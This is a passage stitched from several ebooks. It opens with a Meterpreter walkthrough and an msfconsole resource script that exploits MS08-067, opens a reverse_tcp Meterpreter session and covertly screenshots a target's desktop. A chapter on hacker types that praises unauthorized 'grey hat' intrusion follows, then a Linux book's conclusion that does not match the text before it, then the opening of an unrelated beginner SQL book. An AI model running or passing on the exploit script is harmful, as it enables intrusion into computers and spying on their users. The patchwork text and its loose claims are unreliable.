When you look at PID 932, or whichever one corresponds to your target's system, you will see that it corresponds to a process known as svchost.exe. Since this process has active desktop permissions, you are ready to go. If you don't have the right permissions, you may need to migrate to a process that does. Now you just need to activate the built-in script inside Meterpreter. The script that you need is known as espia.
To do this, simply type:

meterpreter > use espia

Running this installs the espia extension into your session on the target's computer. Now you will be able to get the screenshots that you want. To grab a single screenshot of the target computer, simply type:

meterpreter > screengrab

When you run this command, espia takes a screenshot of what the target's computer is doing at that moment and saves it to the root user's directory, and a copy comes up on your computer. If you did this properly, the target will not realize that you took the screenshots or that you are there at all. You can keep track of what is going on and take as many screenshots as you would like.

These screenshots are pretty easy to set up, and they make it easier than ever to get the information that you need as a hacker. You will receive information not only about where the user is heading, but also about what they are typing into the computer.

Keep in mind that black hat hacking is usually illegal, and it is not encouraged in any way. While black hat hackers would use the methods above to get information, it is best to stay away from using these tactics in an illegal manner. Learning these skills, however, can be a great way to protect yourself against potential threats from black hat hackers. Having hacking skills also allows you to detect security threats in other people's systems. Being a professional hacker can be a highly lucrative career, as big companies pay a lot of money to ensure that their systems are secure. Penetration-testing systems for them is a challenging and fun way to make a living for the skilled hackers out there!
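For reference, the console commands from the walkthrough above can be collected into a single msfconsole resource script, so the whole setup runs with one command. This is a sketch only: the IP addresses are the example lab addresses used earlier, and the Meterpreter commands still have to be typed once the session opens.

```shell
# screenshot_demo.rc -- load with: msfconsole -r screenshot_demo.rc
# Sketch only: replace the example lab IPs below with your own test setup.
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.108
set LHOST 192.168.1.109
show options
exploit

# After the session opens, at the meterpreter > prompt run:
#   getpid       (note the current process ID)
#   ps           (confirm it belongs to a desktop-capable process)
#   use espia    (load the screen-capture extension)
#   screengrab   (save a screenshot of the target's desktop)
```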

Chapter 13 Types of Hackers

All lines of work in society today have different forms. You are either blue collar, white collar, no collar…whatever. Hacking is no different. Just as there are different kinds of jobs associated with different collar colors, the same goes for hacking. Hackers have been classified into many different categories: black hat, white hat, grey hat, newbies, hacktivists, elites, and more. Now, to help you gain a better understanding of what grey hat hacking is, let's first take a look at these other kinds of hacking, so you can get a feel for what hackers do, or can do, when they are online.

Newbies

The best place to start anything is at the beginning, which is why we are starting with the newbie hackers. The problem with a lot of newbie hackers is that they think they have it all figured out when they really don't. Their idea of hacking is really only scratching the surface of everything that is involved, and it is not at all uncommon for people who want to get into it to feel overwhelmed when they see what really needs to be learned. Don't let that discourage you; you are able to learn it all, it just takes time and effort on your part. Borrow books and get online. Look up what needs to be learned and remember it. Don't rush yourself. You need to learn, and really learn. Anything that you don't remember can end up costing you later. There are immediate reactions in the real world of hacking, and sitting there trying to look up what you should have already known is not going to get you far as a hacker. If you want to be good at what you do, then take the time required to be good at it. Don't waste your time if you don't think you really want to learn it, because it is going to take a lot of your concentration to get to the heart of the matter. Don't get me wrong, it is more than worth it, but if you are only looking into it out of curiosity, don't do it unless knowing really means that much to you.
Sure, there are those who kind of know what they are doing, or who can get into their friend's email account, but that is not the hacking I am talking about here. I want you to become a real-life, capable hacker, and that isn't going to happen unless you are willing to take the time needed to learn it, and put forth the effort to learn it. You have to remember that every hacker in existence had to start as a newbie hacker and build up their skills from there. How fast they built those skills depended greatly on how much time and effort they put into working on it, but don't worry, you will get the hang of things, and while you have to start as a newbie, you will have grey hat status soon enough.

Elites

As with the newbie hackers, elite hackers can be any kind of hacker, whether good or bad. What makes them elite is the fact that they are good at what they do, and they know it. There is a lot of respect for elite hackers online. Just like elite anything, they know what they are doing, and they know that others can't challenge them unless those others know how to handle themselves too. There is a level of arrogance that goes with the status, but it is well deserved. Anyone can stop at second best, but it takes true dedication to reach the top. An elite hacker can use their powers for good or bad, but they are a force to be reckoned with either way. They know the way systems work, how to work around them, and how to get them to do what they want them to do. If you have a goal of becoming an elite hacker, you do have your work cut out for you, but don't worry, you will get there. It only takes time and effort to get this top-dog status, and it comes to those who want it. No one 'accidentally' achieves elite status; it is something they had to work for, but it is definitely worth all of the time and effort that is put into it. As an elite hacker, you won't have to worry about whatever system you run into; you will know what is coming and how you can work around it. It just comes with the line of work.

Hacktivists

Hacktivist hackers use their skills to promote a social or political agenda.
Sometimes they are hired by specific groups to get into places online and gather information; sometimes they work all on their own.

The point of this kind of hacking is to make one political party look bad and the one the hacker promotes look good. The hacker either publishes what they find elsewhere online or passes it along so others can see what the person has done or is accused of doing. It is a way for politicians to make jabs at each other, and it isn't really playing the game fairly. The hacker is then either paid by the party that hired them or, if they are working for themselves, they get to see the results of what they posted about the politician.

The list of hackers and what they do goes on and on, but they can all ultimately fit into three categories: black hat, white hat, and grey hat. No matter what other kind of hacker they are on top of it, these are the three all-encompassing realms. This is because these are not only kinds of hackers in and of themselves, but also characteristics of every kind of hacker out there. Whether they are doing things for good, doing things for bad, or doing good things without permission, this is really what hacking comes down to.

Black hat

The black hat hacker is likely the most famous of the hacking world, or rather, the most infamous. This is the line of hacking that movies tend to focus on, and it is the line of hacking that has given all hacking a bad name. A black hat hacker is a hacker who gets into a system or network to cause harm. They always have malicious intent, and they are there to hurt and destroy. They do this either by stealing things, whether it be a person's information, the network's codes, or anything else they find valuable, or by planting worms and viruses into the system. Viruses have been planted into various systems throughout history, causing hundreds of thousands of dollars' worth of damage and putting systems down for days. Viruses are programs that hackers create and then distribute, and they cause havoc on whatever they can get a grip on.
They oftentimes disguise themselves to look like one thing, and they prompt you to open them in whatever way they can. Then, once you do open the link, they get into the hard drive of your system and do whatever they want while they are in there. Many viruses behave like they have a mind of their own, and you would be surprised at the harm they can cause. There is a certain kind of virus, known as a 'backdoor' virus, which allows its sender to have access to and control of whatever system it has planted itself into. It is as though the person who owns the system is nothing more than a bystander who can do nothing but watch as the virus takes its toll on the system. Hackers will use these viruses for a number of reasons, and none of them are good for you. When a hacker has access to your computer, they can do whatever they like on there. They can get into your personal information and use it for their own gain. They can steal your identity, or do things that are illegal while on your computer, making it look like you were the one who did it and escaping suspicion by passing all the blame onto you. These viruses are really hard to get rid of, and it is of utmost importance that you do whatever you can to protect yourself at the outset to make sure you don't get one. However, if you do happen to get one, there is hope. You may have to wipe a lot of your system, or shut it down and rebuild it entirely, but it is always better to do that than to let a hacker have access to anything you are doing. Black hat hackers are malicious. They only do what they do to harm others and cause mischief. It is unfortunate, as this is what put hacking under a bad light, but there is hope, because wherever there is a bad thing, there is also some good to be found, and that good comes in the form of the white and grey hat hackers.

White hat

The white hat hacker and the grey hat hacker are really similar, but there are key differences that make them separate categories. The white hat hacker is a person who is hired by a network or company to get into the system and intentionally try to hack it.
The purpose of this is to test the system or network for weaknesses. Once they can see where hackers get in, they can fix those holes and make it more difficult for the black hat hackers to break in. They often do this through a form of testing known as penetration testing, but we will look more at that later. White hat hackers always have permission to be in the system they are in, and they are there for the sole purpose of looking for vulnerabilities. There is enough demand for this line of work that some white hat hackers do it as a full-time job. The more systems go up, the more hackers are going to try to break into them; and the more hackers try, the more companies are going to need white hat hackers to keep them out. Companies aren't too picky about who they hire to work for them, either, so it is remarkable that so many hackers still choose to go down the black hat path. They could be making decent wages by working for people and getting paid for what they do, but unfortunately not many see it this way, and they would rather hack for their own selfish gain than do what would help others. To put it simply, it can be broken down to a very basic relationship: black hats try to get in, white hats try to keep them out. Sometimes the black hats have the upper hand; other times it goes to the whites. It is like a codependent relationship of villain and superhero, where you are rooting for one but the other still manages to get what they want every once in a while. It is a big circle that works out in the end. Of course, it would be a lot easier if black hat hackers would stop breaking into systems in the first place, but unfortunately that isn't going to happen.

Grey hat

The world is often portrayed as being full of choices that are either right or wrong. You can do it one way, or you can do it any way but that one right way…thus making you wrong. Right and wrong, black and white. Yet…what about the exceptions to the rule? There is an exception to pretty much every rule in existence, and hacking is no exception. Grey hat hackers fall into this realm.
Whether they are right or wrong to do what they do is up to the individual to decide, because it is a grey area. To clarify what I mean, think about it this way. Black hat hackers get into networks without permission to cause harm. That is bad. Very bad. White hat hackers get into systems with permission to provide protection. That is good. Very good. But then you have the grey hat hackers. Grey hat hackers get into a system without permission…which is bad, but they get into that system to help the company or network…which is good. So, in a nutshell, grey hat hackers use bad methods to do good things. Which, in turn, should make the whole event a good thing. Many people feel that it is the grey hat hackers who do the best job of keeping the black hat hackers at bay, but there are still those who argue the grey hats should not do what they do because they have no permission to do it. What is important and universal is the fact that a grey hat hacker never does anything malicious or bad to a system. In fact, they do every bit as much good as the white hat hackers for those who are in charge of the network, but they do it for free. In a way, the grey hat hackers can be considered the Robin Hoods of hacking, doing what they can to help people, unasked, unpaid, and largely without even a 'thank you'.

Conclusion

So you've worked through my book. Congratulations! You have learned all you need to become a capable Linux command-line ninja. You have acquired powerful and really practical skills and knowledge. What remains is a little experience. Undoubtedly, your bash scripting is reasonably good now, but you have to practice to perfect it. This book was meant to introduce you to Linux and the Linux command line right from scratch, teach you what you need to know to use it properly, and a bit more to take you to the next level. At this point, I can say that you are on your way to doing something great with bash, so don't hang up your boots just yet. The next step is to download Linux (if you haven't done so yet) and get started with programming for it! The rest of the books in this series will be dedicated to more detailed information about how to do Linux programming, so for more high-quality information, make sure you check them out.

SQL COMPUTER PROGRAMMING FOR BEGINNERS: LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-STEP GUIDE, IN AN EASY AND COMPREHENSIVE WAY FOR BEGINNERS, INCLUDING PRACTICAL EXERCISES.

JOHN S. CODE

© Copyright 2019 - All rights reserved. The content contained within this book may not be reproduced, duplicated, or transmitted without direct written permission from the author or the publisher. Under no circumstances will any blame or legal responsibility be held against the publisher or author for any damages, reparation, or monetary loss due to the information contained within this book, whether directly or indirectly.

Legal Notice: This book is copyright protected and is only for personal use. You cannot amend, distribute, sell, use, quote, or paraphrase any part of the content within this book without the consent of the author or publisher.

Disclaimer Notice: Please note the information contained within this document is for educational and entertainment purposes only. Every effort has been made to present accurate, up-to-date, reliable, and complete information. No warranties of any kind are declared or implied. Readers acknowledge that the author is not engaged in rendering legal, financial, medical, or professional advice. The content within this book has been derived from various sources. Please consult a licensed professional before attempting any techniques outlined in this book. By reading this document, the reader agrees that under no circumstances is the author responsible for any losses, direct or indirect, incurred as a result of the use of the information contained within this document, including, but not limited to, errors, omissions, or inaccuracies.

Table of Contents

Introduction Chapter 1 Relational Database Concepts Chapter 2 SQL Basics Chapter 3 Some of the Basic Commands We Need to Know Chapter 4 Installing and configuring MySql on your system Chapter 5 Data Types Chapter 6 SQL Constraints Chapter 7 Databases Chapter 8 Tables Chapter 9 Defining Your Condition Chapter 10 Views Chapter 11 Triggers Chapter 12 Combining and Joining Tables Chapter 13 Stored Procedures and Functions Chapter 14 Relationships Chapter 15 Database Normalization Chapter 16 Database Security and Administration Chapter 17 Real-World Uses Conclusion

Introduction

Anything that stores data records is called a database. It can be a file, a CD, a hard disk, or any number of other storage solutions. From a programming point of view, a database is a methodically structured repository of indexed information that can be easily accessed by users for creating, retrieving, updating, and deleting data. Data can be stored in many forms, and most applications require a database for storing information. A database can be of two types: (1) a flat database and (2) a relational database. As the name suggests, a flat database has a two-dimensional structure, with data fields and records stored in one large table. It is not capable of storing complex information, which creates the need for relational databases. A relational database stores data in several tables that are related to each other. Let's take the example of a school. A school has to maintain data for several students. To find information for a student, we will first ask for the class name, then the first name. However, if there are two children with the same first name, we will ask for the surname. If there are two children with identical names, we can still distinguish the information related to them based on their student ID, parents' names, date of birth, siblings in the same school, and so on. This is all related information. When all of this information is stored on paper, it takes a lot of time to retrieve it. Relational databases allow easy access to all of this information. Let's suppose Alex is not feeling well in school and the teacher wants to call his parents to come and pick him up. In the traditional way of maintaining information on paper, if the teacher loses the file with Alex's mom's number, she would not be able to contact her. However, if this information is stored in a database, she just needs to go to the administrator.
The administrator will search for Alex's home records, and within a matter of seconds the teacher will have the contact details. This also frees her from the burden of maintaining separate records for each child, allowing her to focus more time on other teaching-related activities.

A Brief History of SQL

SQL is a programming language designed for Relational Database Management Systems (RDBMSs, or just DBMSs). It is not a general-purpose programming language to be used to create stand-alone programs or web applications. It cannot be used outside of the DBMS world.

The origins of SQL are intertwined with the history of relational databases themselves. It all started with an IBM researcher, Edgar Frank "Ted" Codd, who in June of 1970 published an article entitled "A Relational Model of Data for Large Shared Data Banks" in the journal Communications of the Association for Computing Machinery. In this paper, Codd outlined a mathematical theory of how data could be stored and manipulated using a tabular structure. This article established the foundational theories for relational databases and SQL. Codd's article ignited several research and development efforts, and these eventually led to commercial ventures. The company Relational Software, Inc. was formed in 1977 by a group of engineers in Menlo Park, California, and in 1979 it shipped the first commercially available DBMS product, named Oracle. Relational Software would eventually be renamed Oracle. In 1980, several University of California, Berkeley professors resigned and founded Relational Technology, Inc., and in 1981 they released their DBMS product, named Ingres. In 1982, IBM finally started shipping its DBMS product, named SQL/Data System, or SQL/DS. In 1983, IBM released Database 2, or DB2, for its mainframe systems. By 1985, Oracle proclaimed that it had over 1,000 Oracle installations. Ingres had a comparable number of sites, and IBM's DB2 and SQL/DS products were approaching 1,000. As these vendors were developing their DBMS products, they were also working on their products' query language, SQL. IBM developed SQL at its San Jose Research Laboratory in the early 1970s and formally presented it in 1974 at a conference of the Association for Computing Machinery (ACM). The language was originally named "SEQUEL," for Structured English Query Language, but it was later shortened to just SQL. It was Oracle Corporation, however (then known as Relational Software, Inc.), who came out with the first implementation of SQL for its Oracle DBMS.
IBM came out with its own version in 1981 for its SQL/DS DBMS. Because of the increasing popularity and proliferation of DBMSs and

consequently, SQL, the American National Standards Institute (ANSI) began working on a SQL standard in 1982. This standard, released in 1986 as X3.135, was largely based on IBM's DB2 SQL. In 1987, the International Organization for Standardization (ISO) adopted the ANSI standard as an ISO standard as well. Since 1986, ANSI has continued to work on the SQL standard and released major updates in 1989, 1992, and 1999. The 1999 standard added extensions to SQL to allow the creation of functions either in SQL itself or in another programming language. Since its official appearance, the 1999 standard has been updated three times: in 2003, in 2006, and in 2008. This last update is known as SQL:2008. There have been no updates since then. Current vendors exert admirable efforts to conform to the standard, but they still continue to extend their versions of the SQL language with additional features. The largest vendor, with a market share of 48% as of 2011, is Oracle Corporation. Its flagship DBMS, Oracle 11g, has dominated the UNIX market since the birth of the DBMS market. Oracle 11g is a secure, robust, scalable, high-performance database. However, Oracle 11g holds only second place in the transaction-processing benchmarks; IBM's DB2 holds the record in transaction speed. DB2's current version is 9.7 LUW (Linux, UNIX, and Windows), and IBM holds 25% of the DBMS market. Third is Microsoft, with an 18% share. Its product is SQL Server, and the latest version is 2008 Release 2. Microsoft also has Microsoft Office Access, which is touted as a desktop relational database. Unlike the other DBMSs mentioned in this book, Access is a file-based database and as such has inherent limitations in performance and scalability. It also supports only a subset of the SQL standard. The remaining 12% market share is staked out by Teradata, Sybase, and other vendors, including open-source databases, one of which is MySQL. MySQL was initially developed as a lightweight, fast database in 1994.
The developers, Michael Widenius and David Axmark, intended MySQL to be the backend of data-driven websites. It was fast, had many features, and it

was free. This explains its rise in popularity. In 2008, MySQL was acquired by Sun Microsystems, and Sun Microsystems was later purchased by Oracle. Oracle then offered a commercial version of MySQL in addition to the free version, which was named the "community edition." In programming, a relatively small addition or extension to a language that does not change the intrinsic nature of that language is called a dialect. There are five dominant SQL dialects. PL/SQL, which stands for Procedural Language/Structured Query Language, is Oracle's procedural extension for SQL and the Oracle DBMS. SQL PL is IBM DB2's procedural extension for SQL. Transact-SQL was initially developed jointly by Microsoft and Sybase in the early 1990s, but since then the two companies have diverged, and this has resulted in two distinct versions of Transact-SQL. PL/pgSQL, which stands for Procedural Language/PostgreSQL, is the name of the SQL extensions implemented in PostgreSQL. MySQL introduced a procedural language into its database in version 5, but there is no official name for it; now that Oracle owns MySQL, it is possible that Oracle might introduce PL/SQL as part of MySQL. The above SQL dialects implement the ANSI/ISO standard, so programmers should have few problems migrating from one dialect to another. It is also interesting to note the computer technology landscape during the period when relational databases and SQL began to emerge, the late 1970s to early 1980s. During that period, IBM dominated the computer industry with its mainframe computers but was facing strong competition from minicomputer vendors Digital Equipment, Data General, and Hewlett-Packard, among others. COBOL, C, and Pascal were the predominant languages; Java was non-existent, and object-oriented programming had just emerged. Almost all software was proprietary, with license fees in the tens or hundreds of thousands.
The internet was just a couple of laboratories interconnected to share research papers. The World Wide Web was just a fantasy. Today, most of the dominant software and hardware of that era have gone the way of the dinosaur and much more powerful and innovative technologies have replaced them.

The only exception to this is the DBMS and its Structured Query Language, SQL, which continues to grow and dominate the computer world with no sign of becoming overshadowed or obsolete.

Chapter 1 Relational Database Concepts

What is Data?

Data can be defined as the facts and statistics related to any object under consideration. For example, your name, height, weight, and age are some specific data related to you. An image, a document, or even a picture can also be considered data.

What is a Database?

A database is a place reserved to store and process structured information; in other words, it is a systematic collection of data. It is not a rigid platform: information stored in a database can be manipulated, modified, or adjusted when the need arises. A database also supports the retrieval of stored information for further use. Databases take many forms, storing and organizing information with different structures. In a nutshell, data management becomes easy with databases. For instance, an online telephone directory would certainly use a database to store data pertaining to phone numbers, people, and other contact details. An electricity service provider needs a database to manage billing and other client-related concerns. A database also helps to handle discrepancies in data, among other issues. Consider the global, far-flung social media platform Facebook, which has many members and users connected across the world. A database is needed to store all the information about users and to manipulate and present data related to the platform's users and their online friends. A database also helps to handle various user activities such as birthdays and anniversaries, as well as advertisements, messages, and lots more. In addition, most businesses depend absolutely on databases for their daily operation. Complex multinationals need databases to take inventory, prepare payroll for staff, process orders from clients, and manage transportation, logistics, and shipping, which often requires tracking of goods. All these operations are made easy by a well-structured database. One could go on and on providing innumerable examples of database usage.

What is a Database Management System (DBMS)?

But how can you access the data in your database? This is the function of a Database Management System (DBMS). A DBMS is a collection of programs that enables its users to access the information in the database, manipulate the data, and report or represent the data. A Database Management System also helps to control and restrict access to the database. Database Management Systems were first implemented in the 1960s, so they are not a new concept. Historically, Charles Bachman's Integrated Data Store (IDS) is considered the first Database Management System. Over time, technologies evolved rapidly, and before long the usage and functionality of databases had increased immeasurably.

Types of DBMS

There are four different types of DBMS: hierarchical, network, object-oriented, and relational. Hierarchical DBMSs are rarely used nowadays and usually support a "parent-child" relationship for storing data. Network DBMSs employ many-to-many relationships, which usually results in very complex database structures; an example of this type is the RDM (Raima Database Manager) Server. Object-Oriented DBMSs are employed for newer data types, where the data to be stored are always in the form of objects; an example is TORNADO. A Relational DBMS (RDBMS) defines database relationships in the form of tables, also known as relations. For instance, in a logistics company with a database designed to record fleet information, you can include one table that lists employees and another table that contains the vehicles used by the employees. The two are held separately since

their information is different. Unlike some other Database Management Systems, such as the Network DBMS, an RDBMS does not directly support many-to-many relationships. Relational Database Management Systems also do not support arbitrary data types; they usually have pre-defined data types that they can support. The Relational Database Management System is still the most popular DBMS type in the market today. Common examples of relational database management systems include Oracle, MySQL, and Microsoft SQL Server.

The Relational Model

This model proposes that: 1. Data is organized and then stored in tables. 2. Databases are responsible for holding a collection of data stored in tables.

Elements of a Relational Database Schema

Some of the key elements include:

Tables, Indexes, Keys, Constraints, and Views.

Popular Relational Database Management Systems

There are some popular relational database management systems, and they will be discussed in this chapter.
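The one-to-many relationship between employees and their vehicles described earlier can be sketched in a few statements. The following is a minimal illustration run through Python's built-in sqlite3 module (which embeds the SQLite RDBMS mentioned later in this chapter); the table and column names, such as employees, vehicles, and employee_id, are invented for the example.

```python
import sqlite3

# In-memory database: a minimal sketch of the employee/vehicle
# relationship. Table and column names are invented for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces FKs only when enabled

conn.execute("""
    CREATE TABLE employees (
        id   INTEGER PRIMARY KEY,
        name TEXT NOT NULL
    )
""")
conn.execute("""
    CREATE TABLE vehicles (
        id          INTEGER PRIMARY KEY,
        plate       TEXT NOT NULL,
        employee_id INTEGER REFERENCES employees(id)  -- foreign key
    )
""")

conn.execute("INSERT INTO employees (id, name) VALUES (1, 'Alex')")
conn.execute("INSERT INTO vehicles (id, plate, employee_id) VALUES (10, 'ABC-123', 1)")

# The relationship lets us ask: which vehicle does Alex use?
row = conn.execute("""
    SELECT e.name, v.plate
    FROM employees e
    JOIN vehicles v ON v.employee_id = e.id
""").fetchone()
print(row)  # ('Alex', 'ABC-123')
```

The REFERENCES clause is the foreign key that ties each vehicle row back to the employee who uses it, which is exactly how an RDBMS keeps the two tables separate yet related.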

1. MySQL

This is the most popular open-source SQL database, usually used for web application development. Its main benefits are that it is reliable, inexpensive, and easy to use, and it has therefore been widely adopted by a broad community of developers over the years. MySQL has been in use since 1995.

One of its disadvantages, however, is that it lacks some recent features that more advanced developers would like to use for better performance. It also performs poorly when scaling, and open-source development has lagged since MySQL was taken over by Oracle.

2. PostgreSQL

This is an open-source SQL database that is independent of any corporation. It, too, is used mainly for web application development. Like MySQL, PostgreSQL is easy to use, cheap, and used by a wide community of developers. In addition, foreign key support is one of PostgreSQL's notable features, and it does not require complex configuration. On the other hand, it is less popular than MySQL, which makes it harder to find hosting and support, and it has historically been slower than MySQL.

3. Oracle DB

The code for Oracle Database is not open source. It is owned by Oracle Corporation. It is the database employed by many multinationals around the world, especially top financial institutions such as banks, because it offers a powerful combination of comprehensive technology and pre-integrated business applications, including some functions built specifically for banks. It is not free to use, and it can be very expensive to acquire.

4. SQL Server

This is owned by Microsoft and is not open source. It is mostly used by large enterprises and multinationals. There is a free version, called Express, with which you can test the features, but beyond that it becomes expensive to use.

5. SQLite

This is a very popular open-source SQL database. It can store an entire database in just one file. A major advantage of SQLite is its ability to save or store data locally without using a server at all.

It is a popular choice for embedded devices such as cellphones, MP3 players, PDAs, set-top boxes, and other electronic gadgets.
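SQLite's single-file, serverless design is easy to see from Python, whose standard library embeds SQLite in the sqlite3 module. The sketch below writes a database to one ordinary file and reopens it later; the file name and table are made up for illustration.

```python
import os
import sqlite3
import tempfile

# SQLite keeps the entire database in a single ordinary file --
# no server process is involved. (File and table names are arbitrary.)
path = os.path.join(tempfile.mkdtemp(), "gadget.db")

conn = sqlite3.connect(path)
conn.execute("CREATE TABLE settings (key TEXT PRIMARY KEY, value TEXT)")
conn.execute("INSERT INTO settings VALUES ('volume', '7')")
conn.commit()
conn.close()

# The data survives in that one file and can be reopened at any time.
conn = sqlite3.connect(path)
value = conn.execute(
    "SELECT value FROM settings WHERE key = 'volume'"
).fetchone()[0]
print(value)            # 7
print(os.path.exists(path))  # True
```

Because everything lives in one file, "deploying" such a database is just copying that file, which is why SQLite suits small devices so well.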

Chapter 2 SQL Basics

SQL (Structured Query Language) is a special language used to define data, provide access to data, and process it. SQL is a nonprocedural language: it only describes the necessary components (for example, tables) and the desired results, without specifying how those results should be obtained. Each SQL implementation is a layer over the database engine, which interprets SQL statements and determines the order of access to the database structures needed to form the desired result correctly and efficiently.

Using SQL to Work with Databases

To process a request, the database server translates SQL commands into internal procedures. Because SQL hides the details of data processing, it is easy to use. You can use SQL to help out in the following ways:

SQL helps when you want to create tables based on the data you have.
SQL can store the data that you collect.
SQL can look at your database and retrieve the information there.
SQL allows you to modify data.
SQL can take some of the structures in your database and change them.
SQL allows you to combine data.
SQL allows you to perform calculations.
SQL allows data protection.

Traditionally, many companies would choose to work with a 'Database Management System,' or DBMS, to help them keep organized and keep track of their customers and their products. This was the first option on the market for this kind of organization, and it does work well. But over the years some newer methods have changed the way that companies can sort and hold their information. Even when it comes

to the most basic management system for data that you can choose, you will see that there is far more power and security than you would have found in the past. Big companies are responsible for holding onto a lot of data, and some of this data includes personal information about their customers, like addresses, names, and credit card information. Because of the more complex sort of information that these businesses need to store, the 'Relational Database Management System' was created to help keep this information safe in a way that the plain DBMS has not been able to. Now, as a business owner, there are different options you can pick from when you want a good database management system. Most business owners like to go with SQL because it is one of the best options out there. The SQL language is easy to use, was designed to work well with businesses, and will give you all the tools you need to make sure that your information is safe. Let's take some more time to look at SQL and learn how to make it work for your business.

How this works with your database

If you decide that SQL is the language you will use for managing your database, you can take a look at the database itself. You will notice that when you look at it, you are basically just looking at groups of information. Some people consider these to be organizational mechanisms that store information that you, as the user, can look at later on, as effectively as possible. There are a ton of things that SQL can help you with when it comes to managing your database, and you will see some great results. There are times when you are working on a project with your company, and you may be working with some kind of database that is very similar to SQL without even realizing it. For example, one database that you commonly use is the phone book.
This will contain a ton of information about people in your area including their name, what business they are in, their address, and their phone numbers. And all this information is found in one place so you won't have to search all over to find it. This is kind of how the SQL database works as well. It will do this by looking through the information that you have available through your company database. It will sort through that information so that you are better

able to find what you need the most without making a mess or wasting time.

Relational databases

First, we need to take a look at relational databases. This is the kind of database you will want when your data is aggregated into logical units, or tables, and those tables can be interconnected inside your database in a way that makes sense for what you are looking for at the time. These databases are also good when you want to take in complex information and have the program break it down into smaller pieces so that you can manage it a little better. Relational databases are good to work with because they let you grab all the information you have stored for your business and then manipulate it in a way that makes it easier to use. You can take complex information and break it up in a way that you and others are more likely to understand. While you might be confused by all the information and how to break it up, the system can go through it and sort it the way you need in no time. You also get more security, so that if you place personal information about a customer into the database, you can keep it away from others; in other words, it will be kept safe from people who would want to steal it.

Client and server technology

In the past, if you were working with a computer for your business, you were most likely using a mainframe computer. This meant the machines could host a large system that would store all the information you needed and handle processing. These systems worked, and they got the job done for a very long time. If your company uses them and this is what you are most comfortable with, they do get the work done.
But there are some options on the market that will do a better job. These options can be found in the client-server system. These systems will use some different processes to help you to get the results that are needed. With this one, the main computer that you are using, which would be called the ‘server,’ will be accessible to any user who is on the network. Now, these users must have the right credentials to do this, which

helps to keep the system safe and secure. But if the user has the right information and is on your network, they can reach the information without much trouble and barely any effort. The user can reach the server from other servers or from their desktop computer, and that user is then known as the 'client'; the client and server interact easily through this database.

How to work with databases that are online

There are a lot of business owners who find that client and server technology works for them. This system is great for many companies, but there are some things that you will need to add or take away at times because of how technology has been changing lately. Some companies like the idea of a database that works over the internet, so that they can use the database wherever they are, whether at home or at the office. There are even times when a customer has an account with the company and needs to be able to access the database online as well. For example, if you have an account with Amazon, you are part of their database, and you can gain access to certain parts of it. As the trend of companies moving online continues, it is more common to see databases moving online as well, which means you must have a website and a good web browser so that customers can come in and check them out. You can always add usernames and passwords to make it more secure and to ensure that only the right user gains access to their information. This is a great way to help protect your customers' personal and payment information. Most companies require their users to pick out security credentials to get on the account, but they offer the account for free. Of course, this is a system that is pretty easy to work with, but there will be a number of things going on behind the scenes to make sure that the program works properly.
The customer can simply go onto the system and check the information with ease, but there will be a lot of work for the server to do to make sure that the information is showing up on the screen in the right way, and to ensure that the user will have a good experience and actually see their own account information on the screen.

For example, you may be able to see that the web browser you are using relies on SQL, or a program similar to it, to figure out which data the user is hoping to see.

Why is SQL so great?

Now that we have spent some time talking about the various types of database management systems you can work with, it is time to discuss why you would want to choose SQL over some of the other options out there. You not only have the option of working with other databases but also with other coding languages, and there are benefits to choosing each one. So, why would you want to work with SQL in particular? Some of the great benefits that you can get from using SQL as your database management system include:

Incredibly fast

If you would like to pick a management system that can sort through information quickly and return results in no time, then SQL is one of the best programs to use. Just give it a try, and you will be surprised at how much information you can get back, and how quickly it comes back to you. In fact, out of all the options, this is one of the most efficient ones you can go with.

Well-defined standards

The database that comes with SQL has been working well for a long time. In addition, it has developed good standards that ensure the database is strong and works the way you want. Some of the other databases you may want to work with miss out on these standards, and this can be frustrating when you use them.
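The core operations listed earlier in this chapter, such as creating tables, storing data, retrieving it, and modifying it, take only a few statements. Below is a minimal sketch run through Python's built-in sqlite3 module as a stand-in SQL engine; the products table and its columns are invented for illustration.

```python
import sqlite3

# A minimal sketch of the core SQL operations: CREATE, INSERT,
# SELECT, UPDATE. Table and column names are invented.
conn = sqlite3.connect(":memory:")

# Create a table based on the data we want to keep.
conn.execute("CREATE TABLE products (name TEXT PRIMARY KEY, price REAL)")

# Store data.
conn.execute("INSERT INTO products VALUES ('widget', 2.50)")

# Retrieve it.
price = conn.execute(
    "SELECT price FROM products WHERE name = 'widget'"
).fetchone()[0]
print(price)  # 2.5

# Modify it.
conn.execute("UPDATE products SET price = 3.00 WHERE name = 'widget'")
new_price = conn.execute(
    "SELECT price FROM products WHERE name = 'widget'"
).fetchone()[0]
print(new_price)  # 3.0
```

The same four statement types (CREATE TABLE, INSERT, SELECT, UPDATE) behave essentially the same way in MySQL, PostgreSQL, Oracle, and SQL Server, which is part of what the well-defined standards buy you.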

You do not need a lot of coding

If you are looking into the SQL database, you do not need to be an expert in coding to get the work done. We will take a look at a few pieces of code that can help, but even a beginner can pick these up and do well when working in SQL.

Keeps your stuff organized

When it comes to running your business, it is important that you can keep

your information safe and secure as well as organized. And while there are a ton of great databases you can go with, none will work as well as the SQL language at getting this all done.

Object-oriented DBMS

The SQL database relies on the DBMS system that we talked about earlier, because this makes it easier to find the information that you are searching for, to store the right items, and to do so much more within the database. These are just a few of the benefits that you can get when you choose to work with the SQL program. Some people do struggle with this interface in the beginning, but overall there are a ton of good features to work with in SQL, and you will really enjoy how fast and easy it is to work with this language and its database. You may hear it said that SQL is an incomplete programming language. If you want to use SQL in an application, you must combine SQL with a procedural language like FORTRAN, Pascal, C, Visual Basic, C++, COBOL, or Java. SQL has some strengths and weaknesses because of how the language is structured, and a procedural language that is structured differently will have different strengths and weaknesses. When you combine the two languages, you can overcome the weaknesses of both SQL and the procedural language, and you can build a powerful application with a wide range of capabilities. We use an asterisk to indicate that we want to include all the columns in a table. If the table has many columns, typing an asterisk can save a lot of time. However, do not use an asterisk when you are writing a program in a procedural language. Once you have written the application, you may add a column to the table, or delete one that is no longer necessary. When you do this, you change the meaning of the asterisk, and if you use the asterisk in the application, it may retrieve columns other than the ones it thinks it is getting.
This change will not affect the existing program until you recompile it to make some other change or fix a bug; the effect of the asterisk wildcard then expands to the current set of columns. The application could stop working if you cannot identify the bug during the debugging process. Therefore, when you build an application, refer to the column names explicitly and avoid using the asterisk.
